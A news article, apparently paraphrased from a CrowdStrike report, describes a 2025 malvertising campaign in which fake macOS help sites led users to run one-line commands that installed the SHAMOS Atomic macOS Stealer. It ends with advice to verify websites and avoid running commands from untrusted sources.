Skip to content
News

malicious macOS assistance platforms disseminate data-thieving malware in focused initiative

MacOS users under threat from Atomic macOS Stealer (AMOS) variant, as part of a deceitful advertising campaign that masks support sites, serving as a conduit for cyberattacks.

 and  Administrator
2 min read
Malicious macOS assistance websites aim at disseminating infostealer malware in a focused campaign.
Malicious macOS assistance websites aim at disseminating infostealer malware in a focused campaign.

malicious macOS assistance platforms disseminate data-thieving malware in focused initiative

In a recent blog post, cybersecurity firm CrowdStrike revealed details of a sophisticated malvertising campaign that targeted hundreds of organizations between June and August 2025. The aim of this campaign was to infect victims with the SHAMOS variant of the Atomic macOS Stealer, a type of infostealer, developed by the malware-as-a-service group Cookie Spider.

The malvertising site appeared in Google search results in various locations including the UK, Japan, China, Colombia, Canada, Mexico, Italy, and others. Victims were diverted to fraudulent macOS help websites and encouraged to execute a malicious one-line installation command.

This command, when executed, decides the Base64-encoded string and downloads a file from . The downloaded file is a Bash script that captures the user's password and downloads a SHAMOS Mach-O executable from the same domain.

Since first reporting on this type of campaign in June 2025, CrowdStrike's Counter Adversary Operations has continued to observe eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS. The technique allows cybercriminals to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices.

It's worth noting that no victims were located in Russia, likely due to Russian eCrime forums prohibiting commodity malware operators from targeting users based in Russia.

Previously, Cuckoo Stealer and SHAMOS operators have leveraged this method in Homebrew malvertising campaigns between May 2024 and January 2025. CrowdStrike's Counter Adversary Operations has assessed with high confidence that eCrime actors are likely to continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers.

CrowdStrike blocked the malvertising campaign from attempting to compromise over 300 of its customer environments during this period. The organization behind the malvertising campaign spreading the SHAMOS variant of the Atomic macOS Stealer between June and August 2025 is the cybercriminal group known as Cookie Spider.

This campaign underscores the popularity of malicious one-line installation commands among eCrime actors, and serves as a reminder for macOS users to be vigilant when clicking on links from unknown sources and executing commands from suspicious websites. It's always recommended to verify the authenticity of websites and to keep security software up-to-date to protect against such threats.

Read also:

Related

Latest